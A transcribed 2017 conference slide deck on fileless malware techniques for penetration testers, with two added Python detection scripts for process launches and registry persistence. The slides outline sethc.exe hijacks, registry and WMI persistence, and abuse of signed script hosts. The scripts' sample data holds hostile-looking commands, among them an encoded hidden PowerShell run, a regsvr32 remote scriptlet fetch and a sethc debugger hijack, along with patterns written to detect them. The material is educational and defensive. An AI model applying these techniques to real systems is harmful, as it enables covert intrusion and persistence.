
Fileless Malware Infections

Malware tricks for Pentesters
Bsides Lisbon 2017


  1. FileLess Malware Infections: Malware tricks for Pentesters. Ramon Pinuaga, Bsides Lisbon 2017
  2. Index
     • 1) Presentation
     • 2) Real world examples
     • 3) Process: Infection, Persistence
     • 4) Conclusions
  3. PRESENTATION
  4. Who are you?
     • Pentester for many, many years.
     • Current position: Cybersecurity Audit Manager at PROSEGUR Spain.
     • I prefer the offensive side of security.
  5. What is FileLess Malware?
     • Malicious code that doesn't need to create or drop regular files on the system.
     • A move away from the traditional monolithic malware or pentesting framework.
     • For persistence we usually need to leave at least something on the system, but we can hide it and make it very small.
  6. FileLess or MalwareLess?
     • We have 2 main ways to achieve an infection without files:
     • Not using malware (or code) at all, e.g. planting a configuration-only backdoor on a system. That way we don't control the system all the time, but we can access it later.
     • Using code that never touches disk in its clear form. For persistence we always need a way to keep at least the first stage of the code on the system.
  7. Why FileLess in pentesting?
     • Evading antivirus detection: no file, no scan, no VirusTotal upload.
     • Leaving a smaller forensic trail: fewer artifacts.
     • Difficult environments (hard to upload things).
     • Helps in bypassing application whitelisting (SRP, AppLocker, etc.).
  8. Pentest vs APT
     • Long-term persistence.
     • Kernel-level access.
     • High-level hiding.
     • Quickness and simplicity: only userland, no rootkits, no NSA-like implants.
  9. DEMO: RDP + Sethc
     • Enable remote desktop
     • Hijack sethc.exe
     • Change RDP port
     • Open Windows firewall
  10. How to keep code without files?
     • Keeping all in memory (problem: no persistence).
     • Storing the code in non-file or non-regular storage (classics):
       • Outside the filesystem: UEFI, HDD firmware, hidden disk areas, $EA, etc. (We are not going that far, remember: only userland.)
       • Network / external systems.
       • Alternate Data Streams (ADS).
       • Registry.
  11. Novel non-regular storage
     • WMI (subscriptions).
     • Windows events (.evt).
     • Inside documents (.doc, .xls, .pdf).
     • File/directory names (0-day).
     • Environment variables (more 0-day).
  12. DEMO: Code in filenames
     • Stage 1: Run key
     • Stage 2: Environment
     • Stage 3: Dir names
  13. How to execute code without files?
     • Remote injection in memory -> remote call or exploit.
     • Load of remote binaries (EXEs, DLLs) -> via SMB, WebDAV, etc.
     • Scripting languages -> loaded remotely or from the command line:
       • PowerShell (Powershell.exe)
       • JavaScript/VBScript (Cscript.exe, Wscript.exe, Mshta.exe, Rundll32.exe, Regsvr32.exe)
       • .NET assemblies (InstallUtil.exe, IEExec.exe, RegAsm.exe)
  14. Our FileLess pentest framework
     • Tools already installed on the system (no new files).
     • Tools that allow receiving external input (via command line or via the network).
     • Bonus: tools signed by Microsoft.
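The property that makes these tools a "fileless framework" (pre-installed, signed, and fed with code from the command line or the network) is also what a defender can key on: the executable itself is normal on every host, so detection has to look at what the command line points to and which process launched it. The Python script below is an added example written for this edit, not code from the talk or its author. It parses a constructed, simplified process-creation record format (pipe-separated Key=value fields; real Sysmon or 4688 telemetry needs its own parser) and flags the script hosts listed on slide 13 when the command line references a remote URL or UNC path, carries a base64-encoded PowerShell command, or embeds a javascript:/vbscript: payload (the rundll32 trick the Poweliks slide describes), or when the parent is an Office process (the Word-macro infection route named for Poweliks and WMIghost). The regular expressions, the Office-parent list and the sample records are assumptions, not signatures from the deck; the sample hostnames use the reserved example.invalid domain.

```python
import re
from dataclasses import dataclass, field

# Interpreters named on slide 13: all of them run code fed from the command line,
# the registry or the network, so the executable alone is never enough to alert on.
SCRIPT_HOSTS = frozenset({
    "powershell.exe", "cscript.exe", "wscript.exe", "mshta.exe", "rundll32.exe",
    "regsvr32.exe", "installutil.exe", "ieexec.exe", "regasm.exe",
})
# Office parents (assumed list): Poweliks and WMIghost both start from a Word macro.
OFFICE_PARENTS = frozenset({"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"})

# Heuristics (assumptions for this example, not signatures from the talk).
REMOTE_SOURCE = re.compile(r"(https?://\S+|\\\\[\w.-]+\\\S+)", re.IGNORECASE)  # URL or UNC path
ENCODED_PS = re.compile(r"(?:^|\s)-(?:enc(?:odedcommand)?|ec|e)\s+[A-Za-z0-9+/=]{40,}", re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)  # rundll32 / mshta trick


@dataclass
class Finding:
    image: str
    command_line: str
    reasons: list = field(default_factory=list)


def parse_event(line: str) -> dict:
    """Parse one constructed 'Key=value|Key=value' process-creation record."""
    event = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        event[key.strip()] = value.strip()
    return event


def basename(path: str) -> str:
    """Lower-case file name of a Windows path (handles / and \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(event: dict):
    """Return a Finding when a script host shows a fileless-execution indicator, else None."""
    image = basename(event.get("Image", ""))
    if image not in SCRIPT_HOSTS:
        return None
    cmd = event.get("CommandLine", "")
    reasons = []
    if REMOTE_SOURCE.search(cmd):
        reasons.append("code or binary loaded from a remote location")
    if image == "powershell.exe" and ENCODED_PS.search(cmd):
        reasons.append("base64-encoded PowerShell command")
    if INLINE_SCRIPT.search(cmd):
        reasons.append("inline javascript:/vbscript: payload")
    if basename(event.get("ParentImage", "")) in OFFICE_PARENTS:
        reasons.append("spawned by an Office application")
    return Finding(image, cmd, reasons) if reasons else None


def scan(lines):
    """Run analyse_event over every non-empty record and collect the findings."""
    findings = []
    for line in lines:
        if line.strip():
            finding = analyse_event(parse_event(line))
            if finding:
                findings.append(finding)
    return findings


# Constructed sample records (not real telemetry). The base64 blob decodes to
# "Write-Output 'hi'"; the regsvr32 and UNC samples point at example.invalid.
SAMPLE_EVENTS = r"""
Image=C:\Windows\System32\cmd.exe|CommandLine=cmd /c dir|ParentImage=C:\Windows\explorer.exe
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -nop -w hidden -enc VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAnAGgAaQAnAA==|ParentImage=C:\Program Files\Microsoft Office\WINWORD.EXE
Image=C:\Windows\System32\rundll32.exe|CommandLine=rundll32.exe javascript:"constructed placeholder"|ParentImage=C:\Windows\explorer.exe
Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32.exe /s /i:https://files.example.invalid/stage.sct|ParentImage=C:\Windows\System32\cmd.exe
Image=C:\Windows\System32\cscript.exe|CommandLine=cscript.exe //nologo C:\Scripts\inventory.vbs|ParentImage=C:\Windows\System32\svchost.exe
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -ExecutionPolicy Bypass -File \\fileserver.example.invalid\share\deploy.ps1|ParentImage=C:\Windows\explorer.exe
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS.splitlines()):
        print(f"{f.image}: {', '.join(f.reasons)}")
```

Run stand-alone it reports four of the six sample records; the plain cmd.exe and the locally scheduled cscript.exe job are left alone, which is the point: the interpreter name is the weakest signal, the argument that tells it where to fetch code from is the strongest.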
  15. REAL WORLD EXAMPLES
  16. Real world examples
     • Worms (memory only): Slammer.
     • Poweliks.
     • WMIGhost.
     • Empire.
     • Duqu 2.0 (Kaspersky).
  17. Slammer (2003)
     • Worm that infected thousands of computers and impacted general Internet traffic in some areas.
     • The worm exploited a buffer overflow vulnerability in the Microsoft SQL Server Resolution Service (1434/UDP).
     • Only 376 bytes, and it fitted into a single UDP packet.
  18. Poweliks (2014)
     • Infection via Word macro (not FileLess).
     • Persistence via autostart registry key (HKLM\Software\Microsoft\Windows\CurrentVersion\Run).
     • Minimal first stage: uses a clever rundll32 trick to run JavaScript code.
     • Next stages also stored in the registry (encoded). Runs PowerShell code.
     • PowerShell injects a DLL into another process's memory, without touching disk.
  19. Poweliks – Rundll32 trick
  20. WMIghost (2014)
     • Infection via Word macro.
     • Dropper and UAC bypass binaries touch disk (not fully FileLess).
     • Then it registers the permanent WMI classes it needs: event definition, event filter and event consumer.
     • It uses JavaScript for the payload code in the event consumer's active script.
  21. Empire (2015)
     • PowerShell-based RAT.
     • It tries to be as FileLess as possible.
     • Mostly working from memory only.
     • Various options for persistent storage: registry, ADS, event log and of course WMI subscriptions.
  22. Duqu 2.0 (2015)
     • Unknown infection vector.
     • Only a few selected hosts were used for on-disk persistence.
     • These hosts injected the malware remotely into other systems' memory.
     • For this task the malware gained domain administrator privileges and then deployed MSI packages (via a new service or a scheduled task).
  23. Common FileLess behavior
     • First stage: minimal. Usually a small .vbs or .js (not directly PowerShell).
     • Second stage: main script, based on PowerShell. More complex and powerful logic that injects a binary into another process.
     • Third stage: binary. Usually a PE DLL payload. More similar to traditional malware, but it never touches disk.
  24. PROCESS
  25. Operation Process
     • An ideal FileLess pentest operation should cover the following phases:
       1. FileLess infection.
       2. Installation of FileLess backdoors.
       3. Gaining FileLess persistence.
  26. FileLess Infection
     • Infection without sending any files.
     • Not common. Even known FileLess APT operations use some kind of files in this stage.
     • Preferably, we need to deliver the exploit before it reaches the application layer:
       • Inside a stream.
       • At the lower network layers (e.g. SMB or SSL exploits).
       • Open network services (e.g. EternalBlue).
  27. FileLess Backdoors
     • Configuration-only backdoors (no code).
     • Some popular ones:
       • Create user + remote exec (PsExec/Sc, WMI, SchTasks, WinRM, PSRemoting).
       • Binary image hijack + Remote Desktop.
       • Silver/Golden tickets.
       • Proxy + decreased security.
  28. FileLess persistence
     • First stage: registry autostart entries.
       • Run entries.
       • Scheduled tasks.
       • Image hijacks.
       • WMI.
       • Services (not very elegant).
     • Usually too noisy for a human analyst, but harder to detect with automated tools because no files are used.
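Because the first stage of a fileless chain has to live somewhere, the registry autostart locations on this slide, together with the image hijack behind the "RDP + Sethc" demo, are the places a defender audits first. The Python script below is an added example written for this edit, not code from the talk or its author: it parses a registry export in the plain-text .reg format (the same kind of file the final "Proxy + Authenticode" demo relies on a user executing) and flags Image File Execution Options "Debugger" entries on accessibility binaries, plus Run/RunOnce values that launch a script host rather than a regular program, which is exactly the "minimal first stage" the real-world slides describe. Only string (REG_SZ) values are decoded; the accessibility binaries beyond sethc.exe, the severity labels and the sample export are assumptions, not content from the deck.

```python
import re

# sethc.exe is the binary hijacked in the "RDP + Sethc" demo; the other accessibility
# helpers are assumed here to belong to the same class (they are not listed on the page).
ACCESSIBILITY_BINARIES = frozenset({
    "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe", "magnify.exe",
    "displayswitch.exe", "atbroker.exe",
})
# Script hosts from slide 13: an autostart value that launches one of these is the
# "minimal first stage" (small .vbs/.js or PowerShell loader) the deck describes.
SCRIPT_HOSTS = frozenset({
    "powershell.exe", "cscript.exe", "wscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
})

IFEO_PREFIX = "software\\microsoft\\windows nt\\currentversion\\image file execution options\\"
RUN_KEYS = {
    "software\\microsoft\\windows\\currentversion\\run",
    "software\\microsoft\\windows\\currentversion\\runonce",
}


def unescape_reg_string(raw: str) -> str:
    """Undo the .reg escaping of backslashes and double quotes inside a string value."""
    return raw.replace('\\"', '"').replace("\\\\", "\\")


def parse_reg_export(text: str) -> dict:
    """Parse a .reg export into {key_path: {value_name: data}}.

    Only REG_SZ values ("..." data) are decoded; dword:/hex: data is kept verbatim.
    """
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = re.match(r'^(?:@|"((?:[^"\\]|\\.)*)")=(.*)$', line)
        if m and current is not None:
            name = "(Default)" if m.group(1) is None else unescape_reg_string(m.group(1))
            data = m.group(2)
            if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
                data = unescape_reg_string(data[1:-1])
            keys[current][name] = data
    return keys


def strip_hive(key: str) -> str:
    """Drop the hive (and the SID under HKEY_USERS) so one check covers HKLM and HKCU."""
    parts = key.split("\\")
    hive = parts[0].upper()
    if hive in ("HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER"):
        return "\\".join(parts[1:]).lower()
    if hive == "HKEY_USERS":
        return "\\".join(parts[2:]).lower()
    return key.lower()


def first_token(command: str) -> str:
    """Return the lower-case file name of the executable an autostart command launches."""
    command = command.strip()
    exe = command[1:].split('"', 1)[0] if command.startswith('"') else command.split(" ", 1)[0]
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def audit_persistence(keys: dict) -> list:
    """Return (severity, key, value_name, reason) tuples for the autostart locations checked."""
    findings = []
    for key, values in keys.items():
        path = strip_hive(key)
        if path.startswith(IFEO_PREFIX) and "Debugger" in values:
            target = path[len(IFEO_PREFIX):].split("\\")[0]
            # A debugger on an accessibility binary is the sethc-style hijack; on anything
            # else it is unusual but may be a developer's legitimate setting.
            severity = "high" if target in ACCESSIBILITY_BINARIES else "info"
            findings.append((severity, key, "Debugger",
                             f"IFEO debugger set for {target}: {values['Debugger']}"))
        elif path in RUN_KEYS:
            for name, data in values.items():
                host = first_token(data)
                if host in SCRIPT_HOSTS:
                    findings.append(("medium", key, name, f"autostart runs script host {host}"))
    return findings


# Constructed .reg export (not a real one): a benign Run entry, two script-host loaders,
# the sethc.exe debugger hijack and an ordinary developer debugger entry.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\System32\\SecurityHealthSystray.exe"
"Updater"="wscript.exe //e:jscript C:\\Users\\Public\\stage1.txt"
"Loader"="rundll32.exe javascript:\"constructed placeholder\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\windbg.exe"
'''

if __name__ == "__main__":
    for severity, key, name, reason in audit_persistence(parse_reg_export(SAMPLE_REG)):
        print(f"[{severity}] {key} \\ {name}: {reason}")
```

Against a real host the input would come from an export of the Run, RunOnce and Image File Execution Options keys for HKLM and every loaded user hive; the parser deliberately ignores dword and binary data, so a value hidden as REG_BINARY would need a separate decoder.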
  29. CONCLUSIONS
  30. Conclusions
     • Full pentest operations are possible without using any files (or almost).
     • We need some “resident” artifacts on the system, but these can be very small and can be easily hidden.
  31. Thanks
     • Questions? Comments?
     • https://twitter.com/rpinuaga
  32. Previous research
     • A lot of ideas taken from:
       • Casey Smith: https://twitter.com/subtee
       • Didier Stevens: https://twitter.com/DidierStevens
       • Alex Abramov: https://twitter.com/codereversing
       • Rob Fuller: https://twitter.com/mubix
       • Cneelis: https://twitter.com/Cneelis
       • Matt Nelson: https://twitter.com/enigma0x3
       • Matt Graeber: https://twitter.com/mattifestation
       • James Forshaw: https://twitter.com/tiraniddo
  33. www.prosegur.com
  34. DEMO: Proxy + Authenticode
     • Convince the user to execute a .REG file
     • Configure proxy
     • Disable Authenticode validation
     • Wait for EXE download
